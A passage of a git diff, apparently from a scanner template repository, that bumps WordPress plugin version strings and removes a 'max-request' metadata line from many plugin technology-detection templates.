 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 210 files changed, 10 insertions(+), 210 deletions(-)

diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt
index 472321e4fa..03082db712 100644
--- a/helpers/wordpress/plugins/duplicator.txt
+++ b/helpers/wordpress/plugins/duplicator.txt
@@ -1 +1 @@
-1.5.5.1
\ No newline at end of file
+1.5.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/imagify.txt b/helpers/wordpress/plugins/imagify.txt
index 7c32728738..8f9174b4dd 100644
--- a/helpers/wordpress/plugins/imagify.txt
+++ b/helpers/wordpress/plugins/imagify.txt
@@ -1 +1 @@
-2.1.1
\ No newline at end of file
+2.1.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt
index 8f9174b4dd..b295db3ab7 100644
--- a/helpers/wordpress/plugins/insert-headers-and-footers.txt
+++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt
@@ -1 +1 @@
-2.1.2
\ No newline at end of file
+2.1.3.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt
index ac16d4fc61..dd82ce6db5 100644
--- a/helpers/wordpress/plugins/kadence-blocks.txt
+++ b/helpers/wordpress/plugins/kadence-blocks.txt
@@ -1 +1 @@
-3.1.15
\ No newline at end of file
+3.1.16
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt
index 238cd7ab79..4e940ae2a9 100644
--- a/helpers/wordpress/plugins/mailpoet.txt
+++ b/helpers/wordpress/plugins/mailpoet.txt
@@ -1 +1 @@
-4.27.0
\ No newline at end of file
+4.28.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt
index 813f241fc1..fc3e003067 100644
--- a/helpers/wordpress/plugins/ninja-forms.txt
+++ b/helpers/wordpress/plugins/ninja-forms.txt
@@ -1 +1 @@
-3.6.30
\ No newline at end of file
+3.6.31
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt
index b8d12d7371..d5724cd41b 100644
--- a/helpers/wordpress/plugins/translatepress-multilingual.txt
+++ b/helpers/wordpress/plugins/translatepress-multilingual.txt
@@ -1 +1 @@
-2.6.1
\ No newline at end of file
+2.6.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt
index 90cd64c4fa..6355495f09 100644
--- a/helpers/wordpress/plugins/wordpress-seo.txt
+++ b/helpers/wordpress/plugins/wordpress-seo.txt
@@ -1 +1 @@
-21.1
\ No newline at end of file
+21.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt
index 3f77c63c2d..b81ba511f6 100644
--- a/helpers/wordpress/plugins/wp-seopress.txt
+++ b/helpers/wordpress/plugins/wp-seopress.txt
@@ -1 +1 @@
-6.9
\ No newline at end of file
+6.9.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt
index 79f0f24046..1bc53e339d 100644
--- a/helpers/wordpress/plugins/wp-user-avatar.txt
+++ b/helpers/wordpress/plugins/wp-user-avatar.txt
@@ -1 +1 @@
-4.13.2
\ No newline at end of file
+4.13.3
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
